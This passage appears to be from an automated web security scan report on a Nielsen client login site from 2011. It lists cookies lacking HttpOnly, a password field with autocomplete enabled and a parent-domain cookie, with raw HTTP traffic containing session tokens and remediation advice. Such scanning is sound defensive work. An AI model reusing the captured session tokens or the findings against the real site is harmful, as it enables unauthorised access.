Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:39 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 63634
Last-Modified: Sat, 30 Oct 2010 02:13:52 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/png

.PNG
.
...IHDR...{.................sBIT....|.d....    pHYs...t...t.k$......tEXtCreation Time.03/15/10<..>....tEXtSoftware.Adobe Fireworks CS4........prVWx...Ml.U...a.K...G.n-!....T.Zq.R@Bm..... .(=p..
...[SNIP]...

4.8. https://answers.nielsen.com/gateway/images/answers_ui/ni-chevron.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/answers_ui/ni-chevron.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/answers_ui/ni-chevron.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:39 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 64
Last-Modified: Sat, 30 Oct 2010 02:13:52 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..    ................!.......,......    ....D0.ri..kR0..D9.8..;

4.9. https://answers.nielsen.com/gateway/images/buttons/ni-btn-bg1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/buttons/ni-btn-bg1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/buttons/ni-btn-bg1.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:39 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1028
Last-Modified: Sat, 30 Oct 2010 02:13:52 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.._.....n....4...........D..$......z.\.....<..\..|..4..,...~.l..$......~....\..4..,...v.......$.....T.....|...~.d..<..4........V........t.\ p.P.....t.s.(.........| .......... ...B....|t.`P.....
...[SNIP]...

4.10. https://answers.nielsen.com/gateway/images/buttons/ni-btn-bg2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/buttons/ni-btn-bg2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/buttons/ni-btn-bg2.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:39 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1230
Last-Modified: Sat, 30 Oct 2010 02:13:52 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.._.....n....$.....4...~.$..4...~.4..D..,..<......z.<...~.,..$......    \..D........ .........TQi.F.....bb.[[......|__..w.........V........t.\ w.P.....t.s.(.........| .......... ...B....|t.`P.....
...[SNIP]...

4.11. https://answers.nielsen.com/gateway/images/buttons/ni-btn-onblue-bg3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/buttons/ni-btn-onblue-bg3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/buttons/ni-btn-onblue-bg3.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:39 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1026
Last-Modified: Sat, 30 Oct 2010 02:13:52 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.._.....n....4...........D..$......z.\.....<..\..|..4..,...~.l..$......~....\..4..,...v.......$.....T.....|...~.d..<..4........V.\.........\...........s.......s..t|........... ........|..`......
...[SNIP]...

4.12. https://answers.nielsen.com/gateway/images/buttons/ni-btn-or-bg1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/buttons/ni-btn-or-bg1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/buttons/ni-btn-or-bg1.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/forgottenPassword.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; answers_cookie=R907182360; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:26:46 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1028
Last-Modified: Sat, 30 Oct 2010 02:13:58 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.._.....n....4...........D..$......z.\.....<..\..|..4..,...~.l..$......~....\..4..,...v.......$.....T.....|...~.d..<..4........V.\.........\...........s.......s..t|........... ........|..`......
...[SNIP]...

4.13. https://answers.nielsen.com/gateway/images/buttons/ni-btn-or-bg2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/buttons/ni-btn-or-bg2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/buttons/ni-btn-or-bg2.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/forgottenPassword.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; answers_cookie=R907182360; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:26:46 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1230
Last-Modified: Sat, 30 Oct 2010 02:13:58 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.._.....n....$.....4...~.$..4...~.4..D..,..<......z.<...~.,..$......l.....]..`.....:.......Tf..#..]..`..........|..............V.\.........\...........s.......s..t|........... ........|..`......
...[SNIP]...

4.14. https://answers.nielsen.com/gateway/images/buttons/ni-btn-or-onblue-bg3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/buttons/ni-btn-or-onblue-bg3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/buttons/ni-btn-or-onblue-bg3.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/forgottenPassword.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; answers_cookie=R907182360; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:26:45 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1026
Last-Modified: Sat, 30 Oct 2010 02:13:58 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.._.....n....4...........D..$......z.\.....<..\..|..4..,...~.l..$......~....\..4..,...v.......$.....T.....|...~.d..<..4........V.\.........\...........s.......s..t|........... ........|..`......
...[SNIP]...

4.15. https://answers.nielsen.com/gateway/images/icons/icon_status_user_error_sm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/icons/icon_status_user_error_sm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/icons/icon_status_user_error_sm.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:38 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 155
Last-Modified: Sat, 30 Oct 2010 02:13:52 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a........kk.......11..........!.......,........@.`x.*.,6..p.....`....T.Pq.@.E!..$d.%.T.8.M....F%A.Tp.B...7.M.U....Y....ViJq..ex..D.....cD..^.....    .;

4.16. https://answers.nielsen.com/gateway/logon.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/logon.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630 HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: http://www.nielsen.com/us/en/client-login.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; answers_cookie=R907182360; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:35 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16331


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...

4.17. https://answers.nielsen.com/gateway/support/support.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/support/support.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/support/support.jsp HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:27:39 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48934


<html>
<head>
<title>Nielsen Answers</title>
<style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
font-size: 11px;
color: #333;
}

bo
...[SNIP]...

4.18. https://answers.nielsen.com/portal/site/answers  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /portal/site/answers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/site/answers HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:27:40 GMT
Server: Apache
Cache-Control: no-store
Location: https://answers.nielsen.com/gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2fanswers
Content-Length: 508
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://answers.nielsen.com/gateway/logon.htm?T
...[SNIP]...

5. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/logon.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630 HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: http://www.nielsen.com/us/en/client-login.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; answers_cookie=R907182360; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:35 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16331


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<div style="border:1px solid #FFFFFF;height:189px;width:380px;margin:auto;background: transparent url('/gateway/images/answers_ui/bg_login.png') no-repeat left top;">
        <form class="ni-form" action="/gateway/forms/login.fcc" method="post" name="login_form" AUTOCOMPLETE="ON" styleId="login_form">
        <input type="hidden" name="realm" value="null">
...[SNIP]...
<td class="ni-form-element"><input style="width:100px;" class="ni-form-text-input" id="temp_password" name="PASSWORD" type="password" AUTOCOMPLETE="ON" /></td>
...[SNIP]...

6. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/forms/login.fcc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

